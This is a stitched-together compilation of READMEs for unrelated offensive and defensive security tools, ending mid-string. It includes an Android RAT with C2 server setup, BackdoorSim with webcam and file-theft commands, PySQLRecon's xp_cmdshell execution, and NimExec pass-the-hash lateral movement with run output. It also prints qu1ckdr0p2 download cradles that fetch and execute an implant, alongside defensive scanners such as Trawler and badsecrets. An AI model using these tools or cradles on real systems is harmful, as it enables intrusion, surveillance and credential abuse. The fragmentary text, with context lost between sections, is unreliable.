Remote adminitration tool for android
console git clone https://github.com/Tomiwa-Ot/moukthar.git
/var/www/html/
and install dependencies console mv moukthar/Server/* /var/www/html/ cd /var/www/html/c2-server composer install cd /var/www/html/web\ socket/ composer install
The default credentials are username: android
and password: the rastafarian in you
c2-server/.env
and web socket/.env
database.sql
console php Server/web\ socket/App.php # OR sudo mv Server/websocket.service /etc/systemd/system/ sudo systemctl daemon-reload sudo systemctl enable websocket.service sudo systemctl start websocket.service
/etc/apache2/apache2.conf
xml <Directory /var/www/html/c2-server> Options -Indexes DirectoryIndex app.php AllowOverride All Require all granted </Directory>
functionality/Utils.java
```java public static final String C2_SERVER = "http://localhost";public static final String WEB_SOCKET_SERVER = "ws://localhost:8080"; ``` - Compile APK using Android Studio and deploy to target
BackdoorSim
is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: ControlServer
and BackdoorClient
. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.
This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.
To set up BackdoorSim
, you will need to install it on both the server and client machines.
shell $ git clone https://github.com/HalilDeniz/BackDoorSim.git
shell $ cd BackDoorSim
shell $ pip install -r requirements.txt
After starting both the server and client, you can use the following commands in the server's command prompt:
upload [file_path]
: Upload a file to the client.download [file_path]
: Download a file from the client.screenshot
: Capture a screenshot from the client.sysinfo
: Get system information from the client.securityinfo
: Get security software status from the client.camshot
: Capture an image from the client's webcam.notify [title] [message]
: Send a notification to the client.help
: Display the help menu.BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.
If you are interested in tools like BackdoorSim, be sure to check out my recently released RansomwareSim tool
If you want to read our article about Backdoor
Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions. 1. Fork the repository. 2. Create a new branch for your feature or bug fix. 3. Make your changes and commit them. 4. Push your changes to your forked repository. 5. Open a pull request in the main repository.
For any inquiries or further information, you can reach me through the following channels:
Find authentication (authn) and authorization (authz) security bugs in web application routes:
Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources highlight the severity of the issue:
Supported web frameworks (route-detect
IDs in parentheses):
django
, django-rest-framework
), Flask (flask
), Sanic (sanic
)laravel
), Symfony (symfony
), CakePHP (cakephp
)rails
), Grape (grape
)jax-rs
), Spring (spring
)gorilla
), Gin (gin
), Chi (chi
)express
), React (react
), Angular (angular
)*Rails support is limited. Please see this issue for more information.
Use pip
to install route-detect
:
$ python -m pip install --upgrade route-detect
You can check that route-detect
is installed correctly with the following command:
$ echo 'print(1 == 1)' | semgrep --config $(routes which test-route-detect) -
Scanning 1 file.
Findings:
/tmp/stdin
routes.rules.test-route-detect
Found '1 == 1', your route-detect installation is working correctly
1Γ’ββ print(1 == 1)
Ran 1 rule on 1 file: 1 finding.
route-detect
provides the routes
CLI command and uses semgrep
to search for routes.
Use the which
subcommand to point semgrep
at the correct web application rules:
$ semgrep --config $(routes which django) path/to/django/code
Use the viz
subcommand to visualize route information in your browser:
$ semgrep --json --config $(routes which django) --output routes.json path/to/django/code
$ routes viz --browser routes.json
If you're not sure which framework to look for, you can use the special all
ID to check everything:
$ semgrep --json --config $(routes which all) --output routes.json path/to/code
If you have custom authn or authz logic, you can copy route-detect
's rules:
$ cp $(routes which django) my-django.yml
Then you can modify the rule as necessary and run it like above:
$ semgrep --json --config my-django.yml --output routes.json path/to/django/code
$ routes viz --browser routes.json
route-detect
uses poetry
for dependency and configuration management.
Before proceeding, install project dependencies with the following command:
$ poetry install --with dev
Lint all project files with the following command:
$ poetry run pre-commit run --all-files
Run Python tests with the following command:
$ poetry run pytest --cov
Run Semgrep rule tests with the following command:
$ poetry run semgrep --test --config routes/rules/ tests/test_rules/
PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.
PySQLRecon can be installed with pip3 install pysqlrecon
or by cloning this repository and running pip3 install .
All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV]
require elevated privileges or sysadmin rights to run. Alternatively, commands marked with [NORM]
can likely be run by normal users and do not require elevated privileges.
Support for impersonation ([I]
) or execution on linked servers ([L]
) are denoted at the end of the command description.
adsi [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
agentcmd [PRIV] Execute a system command using agent jobs [I,L]
agentstatus [PRIV] Enumerate SQL agent status and jobs [I,L]
checkrpc [NORM] Enumerate RPC status of linked servers [I,L]
clr [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
columns [NORM] Enumerate columns within a table [I,L]
databases [NORM] Enumerate databases on a server [I,L]
disableclr [PRIV] Disable CLR integration [I,L]
disableole [PRIV] Disable OLE automation procedures [I,L]
disablerpc [PRIV] Disable RPC and RPC Out on linked server [I]
disablexp [PRIV] Disable xp_cmdshell [I,L]
enableclr [PRIV] Enable CLR integration [I,L]
enableole [PRIV] Enable OLE automation procedures [I,L]
enablerpc [PRIV] Enable RPC and RPC Out on linked server [I]
enablexp [PRIV] Enable xp_cmdshell [I,L]
impersonate [NORM] Enumerate users that can be impersonated
info [NORM] Gather information about the SQL server
links [NORM] Enumerate linked servers [I,L]
olecmd [PRIV] Execute a system command using OLE automation procedures [I,L]
query [NORM] Execute a custom SQL query [I,L]
rows [NORM] Get the count of rows in a table [I,L]
search [NORM] Search a table for a column name [I,L]
smb [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
tables [NORM] Enu merate tables within a database [I,L]
users [NORM] Enumerate users with database access [I,L]
whoami [NORM] Gather logged in user, mapped user and roles [I,L]
xpcmd [PRIV] Execute a system command using xp_cmdshell [I,L]
PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:
pysqlrecon [GLOBAL_OPTS] COMMAND [COMMAND_OPTS]
View global options:
pysqlrecon --help
View command specific options:
pysqlrecon [GLOBAL_OPTS] COMMAND --help
Change the database authenticated to, or used in certain PySQLRecon commands (query
, tables
, columns
rows
), with the --database
flag.
Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the --link
flag.
Impersonate a user account while running a PySQLRecon command with the --impersonate
flag.
--link
and --impersonate
and incompatible.
pysqlrecon uses Poetry to manage dependencies. Install from source and setup for development with:
git clone https://github.com/tw1sm/pysqlrecon
cd pysqlrecon
poetry install
poetry run pysqlrecon --help
PySQLRecon is easily extensible - see the template and instructions in resources
Basically, NimExec is a fileless remote command execution tool that uses The Service Control Manager Remote Protocol (MS-SCMR). It changes the binary path of a random or given service run by LocalSystem to execute the given command on the target and restores it later via hand-crafted RPC packets instead of WinAPI calls. It sends these packages over SMB2 and the svcctl named pipe.
NimExec needs an NTLM hash to authenticate to the target machine and then completes this authentication process with the NTLM Authentication method over hand-crafted packages.
Since all required network packages are manually crafted and no operating system-specific functions are used, NimExec can be used in different operating systems by using Nim's cross-compilability support.
This project was inspired by Julio's SharpNoPSExec tool. You can think that NimExec is Cross Compilable and built-in Pass the Hash supported version of SharpNoPSExec. Also, I learned the required network packet structures from Kevin Robertson's Invoke-SMBExec Script.
nim c -d:release --gc:markAndSweep -o:NimExec.exe Main.nim
The above command uses a different Garbage Collector because the default garbage collector in Nim is throwing some SIGSEGV errors during the service searching process.
Also, you can install the required Nim modules via Nimble with the following command:
nimble install ptr_math nimcrypto hostname
test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t 10.200.2.2 -c 'cmd.exe /c "echo test > C:\Users\Public\test.txt"' -v
_..._
.-'_..._''.
_..._ .--. __ __ ___ __.....__ __.....__ .' .' '.\
.' '. |__|| |/ `.' `. .-'' '. .-'' '. / .'
. .-. ..--.| .-. .-. ' / .-''"'-. `. / .-''"'-. `. . '
| ' ' || || | | | | |/ /________\ \ ____ _____/ /________\ \| |
| | | || || | | | | || |`. \ .' /| || |
| | | || || | | | | |\ .--- ----------' `. `' .' \ .-------------'. '
| | | || || | | | | | \ '-.____...---. '. .' \ '-.____...---. \ '. .
| | | ||__||__| |__| |__| `. .' .' `. `. .' '. `._____.-'/
| | | | `''-...... -' .' .'`. `. `''-...... -' `-.______ /
| | | | .' / `. `. `
'--' '--' '----' '----'
@R0h1rr1m
[+] Connected to 10.200.2.2:445
[+] NTLM Authentication with Hash is succesfull!
[+] Connected to IPC Share of target!
[+] Opened a handle for svcctl pipe!
[+] Bound to the RPC Interface!
[+] RPC Binding is acknowledged!
[+] SCManager handle is obtained!
[+] Number of obtained services: 265
[+] Selected service is LxpSvc
[+] Service: LxpSvc is opened!
[+] Previous Service Path is: C:\Windows\system32\svchost.exe -k netsvcs
[+] Service config is changed!
[!] StartServiceW Return Value: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)
[+] Service start request is sent!
[+] Service config is restored!
[+] Service handle is closed!
[+] Service Manager handle is closed!
[+] SMB is closed!
[+] Tree is disconnected!
[+] Session logoff!
It's tested against Windows 10&11, Windows Server 16&19&22 from Ubuntu 20.04 and Windows 10 machines.
-v | --verbose Enable more verbose output.
-u | --username <Username> Username for NTLM Authentication.*
-h | --hash <NTLM Hash> NTLM password hash for NTLM Authentication.*
-t | --target <Target> Lateral movement target.*
-c | --command <Command> Command to execute.*
-d | --domain <Domain> Domain name for NTLM Authentication.
-s | --service <Service Name> Name of the service instead of a random one.
--help Show the help message.
Welcome to CryptChat - where conversations remain truly private. Built on the robust Python ecosystem, our application ensures that every word you send is wrapped in layers of encryption. Whether you're discussing sensitive business details or sharing personal stories, CryptChat provides the sanctuary you need in the digital age. Dive in, and experience the next level of secure messaging!
Clone the repository:
git clone https://github.com/HalilDeniz/CryptoChat.git
Navigate to the project directory:
cd CryptoChat
Install the required dependencies:
pip install -r requirements.txt
$ python3 server.py --help
usage: server.py [-h] [--host HOST] [--port PORT]
Start the chat server.
options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to.
--port PORT The port number to bind the server to.
--------------------------------------------------------------------------
$ python3 client.py --help
usage: client.py [-h] [--host HOST] [--port PORT]
Connect to the chat server.
options:
-h, --help show this help message and exit
--host HOST The server's IP address.
--port PORT The port number of the server.
$ python3 serverE.py --help
usage: serverE.py [-h] [--host HOST] [--port PORT] [--key KEY]
Start the chat server.
options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=0.0.0.0)
--port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encryption. (Default=mysecretpassword)
--------------------------------------------------------------------------
$ python3 clientE.py --help
usage: clientE.py [-h] [--host HOST] [--port PORT] [--key KEY]
Connect to the chat server.
options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=127.0.0.1)
--port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encr yption. (Default=mysecretpassword)
--help
: show this help message and exit--host
: The IP address to bind the server.--port
: The port number to bind the server.--key
: The secret key for encryptionContributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.
If you have any questions, comments, or suggestions about CryptChat, please feel free to contact me:
Rapidly host payloads and post-exploitation bins over HTTP or HTTPS.
Designed to be used on exams like OSCP / PNPT or CTFs HTB / etc.
Pull requests and issues welcome. As are any contributions.
Qu1ckdr0p2 comes with an alias and search feature. The tools are located in the qu1ckdr0p2-tools repository. By default it will generate a self-signed certificate to use when using the --https
option, priority is also given to the tun0
interface when the webserver is running, otherwise it will use eth0
.
The common.ini defines the mapped aliases used within the --search and -u
options.
When the webserver is running there are several download cradles printed to the screen to copy and paste.
pip3 install qu1ckdr0p2
echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc
source ~/.zshrc
or
echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc
source ~/.bashrc
serv init --update
$ serv serve -f implant.bin --https 443
$ serv serve -f file.example --http 8080
$ serv --help
Usage: serv [OPTIONS] COMMAND [ARGS]...
Welcome to qu1ckdr0p2 entry point.
Options:
--debug Enable debug mode.
--help Show this message and exit.
Commands:
init Perform updates.
serve Serve files.
$ serv serve --help
Usage: serv serve [OPTIONS]
Serve files.
Options:
-l, --list List aliases
-s, --search TEXT Search query for aliases
-u, --use INTEGER Use an alias by a dynamic number
-f, --file FILE Serve a file
--http INTEGER Use HTTP with a custom port
--https INTEGER Use HTTPS with a custom port
-h, --help Show this message and exit.
$ serv init --help
Usage: serv init [OPTIONS]
Perform updates.
Options:
--update Check and download missing tools.
--update-self Update the tool using pip.
--update-self-test Used for dev testing, installs unstable build.
--help Show this message and exit.
$ serv init --update
$ serv init --update-self
The mapped alias numbers for the -u
option are dynamic so you don't have to remember specific numbers or ever type out a tool name.
$ serv serve --search ligolo
[β] Path: ~/.qu1ckdr0p2/windows/agent.exe
[β] Alias: ligolo_agent_win
[β] Use: 1
[β] Path: ~/.qu1ckdr0p2/windows/proxy.exe
[β] Alias: ligolo_proxy_win
[β] Use: 2
[β] Path: ~/.qu1ckdr0p2/linux/agent
[β] Alias: ligolo_agent_linux
[β] Use: 3
[β] Path: ~/.qu1ckdr0p2/linux/proxy
[β] Alias: ligolo_proxy_linux
[β] Use: 4
(...)
$ serv serve --search ligolo -u 3 --http 80
[β] Serving: ../../.qu1ckdr0p2/linux/agent
[β] Protocol: http
[β] IP address: 192.168.1.5
[β] Port: 80
[β] Interface: eth0
[β] CTRL+C to quit
[β] URL: http://192.168.1.5:80/agent
[β] csharp:
$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'
[β] wget:
wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent
[β] curl:
curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent
[β] powershell:
Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent
β § Web server running
MIT
DNSWatch is a Python-based tool that allows you to sniff and analyze DNS (Domain Name System) traffic on your network. It listens to DNS requests and responses and provides insights into the DNS activity.Β
git clone https://github.com/HalilDeniz/DNSWatch.git
pip install -r requirements.txt
python dnswatch.py -i <interface> [-v] [-o <output_file>] [-k <target_ip>] [--analyze-dns-types] [--doh]
-i
, --interface
: Specify the network interface (e.g., eth0).-v
, --verbose
: Use this flag for more verbose output.-o
, --output
: Specify the filename to save results.-t
, --target-ip
: Specify a specific target IP address to monitor.-adt
, --analyze-dns-types
: Analyze DNS types.--doh
: Use DNS over HTTPS (DoH) for resolving DNS requests.-fd
, --target-domains
: Filter DNS requests by specified domains.-d
, --database
: Enable database storage for DNS requests.Press Ctrl+C
to stop the sniffing process.
python dnswatch.py -i eth0
python dnswatch.py -i eth0 -o dns_results.txt
python dnswatch.py -i eth0 -k 192.168.1.100
python dnswatch.py -i eth0 --analyze-dns-types
python dnswatch.py -i eth0 --doh
python3 dnswatch.py -i wlan0 --database
DNSWatch is licensed under the MIT License. See the LICENSE file for details.
This tool is intended for educational and testing purposes only. It should not be used for any malicious activities.
Trawler is a PowerShell script designed to help Incident Responders discover potential indicators of compromise on Windows hosts, primarily focused on persistence mechanisms including Scheduled Tasks, Services, Registry Modifications, Startup Items, Binary Modifications and more.
Currently, trawler can detect most of the persistence techniques specifically called out by MITRE and Atomic Red Team with more detections being added on a regular basis.
Just download and run trawler.ps1 from an Administrative PowerShell/cmd prompt - any detections will be displayed in the console as well as written to a CSV ('detections.csv') in the current working directory. The generated CSV will contain Detection Name, Source, Risk, Metadata and the relevant MITRE Technique.
Or use this one-liner from an Administrative PowerShell terminal:
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/joeavanzato/Trawler/main/trawler.ps1'))
Certain detections have allow-lists built-in to help remove noise from default Windows configurations (10/2016/2019/2022) - expected Scheduled Tasks, Services, etc. Of course, it is always possible for attackers to hijack these directly and masquerade with great detail as a default OS process - take care to use multiple forms of analysis and detection when dealing with skillful adversaries.
If you have examples or ideas for additional detections, please feel free to submit an Issue or PR with relevant technical details/references - the code-base is a little messy right now and will be cleaned up over time.
Additionally, if you identify obvious false positives, please let me know by opening an issue or PR on GitHub! The obvious culprits for this will be non-standard COMs, Services or Tasks.
-scanoptions : Tab-through possible detections and select a sub-set using comma-delimited terms (eg. .\trawler.ps1 -scanoptions Services,Processes)
-hide : Suppress Detection output to console
-snapshot : Capture a "persistence snapshot" of the current system, defaulting to "$PSScriptRoot\snapshot.csv"
-snapshotpath : Define a custom file-path for saving snapshot output to.
-outpath : Define a custom file-path for saving detection output to (defaults to "$PSScriptRoot\detections.csv")
-loadsnapshot : Define the path for an existing snapshot file to load as an allow-list reference
-drivetarget : Define the variable for a mounted target drive (eg. .\trawler.ps1 -targetdrive "D:") - using this alone leads to an 'assumed homedrive' variable of C: for analysis purposes
PersistenceSniper is an awesome tool - I've used it heavily in the past - but there are a few key points that differentiate these utilities
Overall, these tools are extremely similar but approach the problem from slightly different angles - PersistenceSniper provides all information back to the analyst for review while Trawler tries to limit what is returned to only results that are likely to be potential adversary persistence mechanisms. As such, there is a possibility for false-negatives with trawler if an adversary completely mimics an allow-listed item.
Trawler supports loading an allow-list from a 'snapshot' - to do this requires two steps.
That's it - all relevant detections will then draw from the snapshot file as an allow-list to reduce noise and identify any potential changes to the base image that may have occurred.
(Allow-listing is implemented for most of the checks but not all - still being actively implemented)
Often during an investigation, analysts may end up mounting a new drive that represents an imaged Windows device - Trawler now partially supports scanning these mounted drives through the use of the '-drivetarget' parameter.
At runtime, Trawler will re-target temporary script-level variables for use in checking file-based artifacts and also will attempt to load relevant Registry Hives (HKLM\SOFTWARE, HKLM\SYSTEM, NTUSER.DATs, USRCLASS.DATs) underneath HKLM/HKU and prefixed by 'ANALYSIS_'. Trawler will also attempt to unload these temporarily loaded hives upon script completion.
As an example, if you have an image mounted at a location such as 'F:\Test' which contains the NTFS file system ('F:\Test\Windows', 'F:\Test\User', etc) then you can invoke trawler like below;
.\trawler.ps1 -drivetarget "F:\Test"
Please note that since trawler attempts to load the registry hive files from the drive in question, mapping a UNC path to a live remote device will NOT work as those files will not be accessible due to system locks. I am working on an approach which will handle live remote devices, stay tuned.
Most other checks will function fine because they are based entirely on reading registry hives or file-based artifacts (or can be converted to do so, such as directly reading Task XML as opposed to using built-in command-lets.)
Any limitations in checks when doing drive-retargeting will be discussed more fully in the GitHub Wiki.
Β
TODO
Please be aware that some of these are (of course) more detected than others - for example, we are not detecting all possible registry modifications but rather inspecting certain keys for obvious changes and using the generic MITRE technique "Modify Registry" where no other technique is applicable. For other items such as COM hijacking, we are inspecting all entries in the relevant registry section, checking against 'known-good' patterns and bubbling up unknown or mismatched values, resulting in a much more complete detection surface for that particular technique.
This tool would not exist without the amazing InfoSec community - the most notable references I used are provided below.
Columbus Project is an API first subdomain discovery service, blazingly fast subdomain enumeration service with advanced features.
Columbus returned 638 subdomains of tesla.com in 0.231 sec.
By default Columbus returns only the subdomains in a JSON string array:
curl 'https://columbus.elmasy.com/lookup/github.com'
But we think of the bash lovers, so if you don't want to mess with JSON and a newline separated list is your wish, then include the Accept: text/plain
header.
DOMAIN="github.com"
curl -s -H "Accept: text/plain" "https://columbus.elmasy.com/lookup/$DOMAIN" | \
while read SUB
do
if [[ "$SUB" == "" ]]
then
HOST="$DOMAIN"
else
HOST="${SUB}.${DOMAIN}"
fi
echo "$HOST"
done
For more, check the features or the API documentation.
Currently, entries are got from Certificate Transparency.
Usage of columbus-server:
-check
Check for updates.
-config string
Path to the config file.
-version
Print version informations.
-check
: Check the lates version on GitHub. Prints up-to-date
and returns 0
if no update required. Prints the latest tag (eg.: v0.9.1
) and returns 1
if new release available. In case of error, prints the error message and returns 2
.
git clone https://github.com/elmasy-com/columbus-server
make build
Create a new user:
adduser --system --no-create-home --disabled-login columbus-server
Create a new group:
addgroup --system columbus
Add the new user to the new group:
usermod -aG columbus columbus-server
Copy the binary to /usr/bin/columbus-server
.
Make it executable:
chmod +x /usr/bin/columbus-server
Create a directory:
mkdir /etc/columbus
Copy the config file to /etc/columbus/server.conf
.
Set the permission to 0600.
chmod -R 0600 /etc/columbus
Set the owner of the config file:
chown -R columbus-server:columbus /etc/columbus
Install the service file (eg.: /etc/systemd/system/columbus-server.service
).
cp columbus-server.service /etc/systemd/system/
Reload systemd:
systemctl daemon-reload
Start columbus:
systemctl start columbus-server
If you want to columbus start automatically:
systemctl enable columbus-server
A pure python library for identifying the use of known or very weak cryptographic secrets across a variety of platforms. The project is designed to be both a repository of various "known secrets" (for example, ASP.NET machine keys found in examples in tutorials), and to provide a language-agnostic abstraction layer for identifying their use.
Knowing when a 'bad secret' was used is usually a matter of examining some cryptographic product in which the secret was used: for example, a cookie which is signed with a keyed hashing algorithm. Things can get complicated when you dive into the individual implementation oddities each platform provides, which this library aims to alleviate.
Check out our full blog post on the Black Lantern Security blog!
Inspired by Blacklist3r, with a desire to expand on the supported platforms and remove language and operating system dependencies.
Name | Description |
---|---|
ASPNET_Viewstate | Checks the viewstate/generator against a list of known machine keys. |
Telerik_HashKey | Checks patched (2017+) versions of Telerik UI for a known Telerik.Upload.ConfigurationHashKey |
Telerik_EncryptionKey | Checks patched (2017+) versions of Telerik UI for a known Telerik.Web.UI.DialogParametersEncryptionKey |
Flask_SignedCookies | Checks for weak Flask cookie signing password. Wrapper for flask-unsign |
Peoplesoft_PSToken | Can check a peoplesoft PS_TOKEN for a bad/weak signing password |
Django_SignedCookies | Checks django's session cookies (when in signed_cookie mode) for known django secret_key |
Rails_SecretKeyBase | Checks Ruby on Rails signed or encrypted session cookies (from multiple major releases) for known secret_key_base |
Generic_JWT | Checks JWTs for known HMAC secrets or RSA private keys |
Jsf_viewstate | Checks Both Mojarra and Myfaces implimentations of Java Server Faces (JSF) for use of known or weak secret keys |
Symfony_SignedURL | Checks symfony "_fragment" urls for known HMAC key. Operates on Full URL, including hash |
Express_SignedCookies | Checks express.js signed cookies and session cookies for known 'session secret' |
Laravel_SignedCookies | Checks 'laravel_session' cookies for known laravel 'APP_KEY' |
We have a pypi package, so you can just do pip install badsecrets
to make use of the library.
The absolute easiest way to use Badsecrets is by simply running badsecrets
after doing a pip install:
pip install badsecrets
badsecrets eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo
This is doing the same thing as the cli.py
example shown below.
To use the examples, after doing the pip install just git clone
the repo and cd
into the badsecrets
directory:
git clone https://github.com/blacklanternsecurity/badsecrets.git
cd badsecrets
The commands in the example section below assume you are in this directory.
If you are using the Badsecrets BBOT module, you don't need to do anything else - BBOT will install the package for you.
Bad secrets includes an example CLI for convenience when manually checking secrets. It also has a URL mode, which will connect to a target and attempt to carve for cryptographic products and check any it finds against all modules.
python ./badsecrets/examples/cli.py eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo
python ./badsecrets/examples/cli.py --url http://example.com/contains_bad_secret.html
You can also set a custom user-agent with --user-agent "user-agent string"
or a proxy with --proxy http://127.0.0.1
in this mode.
Example output:
$ python ./badsecrets/examples/cli.py eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo
badsecrets - example command line interface
***********************
Known Secret Found!
Detecting Module: Generic_JWT
Secret: 1234
Details: {'Issuer': 'Issuer', 'Username': 'BadSecrets', 'exp': 1593133483, 'iat': 1466903083, 'jwt_headers': {'alg': 'HS256'}}
***********************
Bad secrets includes a fully functional CLI example which replicates the functionality of blacklist3r in python badsecrets/examples/blacklist3r.
python ./badsecrets/examples/blacklist3r.py --url http://vulnerablesite/vulnerablepage.aspx
python ./badsecrets/examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE
Fully functional CLI example for identifying known Telerik Hash keys and Encryption keys for Post-2017 versions (those patched for CVE-2017-9248), and brute-forcing version / generating exploitation DialogParameters values.
python ./badsecrets/examples/telerik_knownkey.py --url http://vulnerablesite/Telerik.Web.UI.DialogHandler.aspx
Optionally include ASP.NET MachineKeys with --machine-keys (Will SIGNIFICANTLY increase brute-forcing time)
Brute-force detection of Symfony known secret key when "_fragment" URLs are enabled, even when no example URL containing a hash can be located. Relevent Blog Post.
python ./badsecrets/examples/symfony_knownkey.py --url https://localhost/
One of the best ways to use Badsecrets, especially for the ASPNET_Viewstate
and Jsf_viewstate
modules is with the Badsecrets BBOT module. This will allow you to easily check across thousands of systems in conjunction with subdomain enummeration.
bbot -f subdomain-enum -m badsecrets -t evil.corp
See if a token or other cryptographic product was produced with a known key
from badsecrets import modules_loaded
Django_SignedCookies = modules_loaded["django_signedcookies"]
ASPNET_Viewstate = modules_loaded["aspnet_viewstate"]
Flask_SignedCookies = modules_loaded["flask_signedcookies"]
Peoplesoft_PSToken = modules_loaded["peoplesoft_pstoken"]
Telerik_HashKey = modules_loaded["telerik_hashkey"]
Telerik_EncryptionKey = modules_loaded["telerik_encryptionkey"]
Rails_SecretKeyBase = modules_loaded["rails_secretkeybase"]
Generic_JWT = modules_loaded["generic_jwt"]
Jsf_viewstate = modules_loaded["jsf_viewstate"]
Symfony_SignedURL = modules_loaded["symfony_signedurl"]
Express_SignedCookies = modules_loaded["express_signedcookies"]
Laravel_SignedCookies = modules_loaded["laravel_signedcookies"]
x = ASPNET_Viewstate()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("AgF5WuyVO11CsYJ1K5rjyuLXqUGCITSOapG1cYNiriYQ6VTKochMpn8ws4eJRvft81nQIA==","EDD8C9AE")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Telerik_HashKey()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("vpwClvnLODIx9te2vO%2F4e06KzbKkjtwmNnMx09D1Dmau0dPliYzgpqB9MnEqhPNe3fWemQyH25eLULJi8KiYHXeHvjfS1TZAL2o5Gku1gJbLuqusRXZQYTNlU2Aq4twXO0o0CgVUTfknU89iw0ceyaKjSteOhxGvaE3VEDfiKDd8%2B9j9vD3qso0mLMqn%2Btxirc%2FkIq5oBbzOCgMrJjkaPMa2SJpc5QI2amffBJ%2BsAN25VH%2BwabEJXrjRy%2B8NlYCoUQQKrI%2BEzRSdBsiMOxQTD4vz2TCjSKrK5JEeFMTyE7J39MhXFG38Bq%2FZMDO%2FETHHdsBtTTkqzJ2odVArcOzrce3Kt2%2FqgTUPW%2BCjFtkSNmh%2FzlB9BhbxB1kJt1NkNsjywvP9j7PvNoOBJsa8OwpEyrPTT3Gm%2BfhDwtjvwpvN7l7oIfbcERGExAFrAMENOOt4WGlYhF%2F8c9NcDv0Bv3YJrJoGq0rRurXSh9kcwum9nB%2FGWcjPikqTDm6p3Z48hEnQCVuJNkwJwIKEsYxJqCL95IEdX3PzR81zf36uXPlEa3YdeAgM1RD8YGlwlIXnrLhvMbRvQW0W9eoPzE%2FjP68JGUIZc1TwTQusIWjnuVubFTEUMDLfDNk12tMwM9mfnwT8lWFTMjv9pF70W5OtO7gVN%2BOmCxqAuQmScRVExNds%2FF%2FPli4oxRKfgI7FhAaC%2Fu1DopZ6vvBdUq1pBQE66fQ9SnxRTmIClCpULUhNO90ULTpUi9ga2UtBCTzI8z6Sb6qyQ52NopNZMFdrn9orzdP8 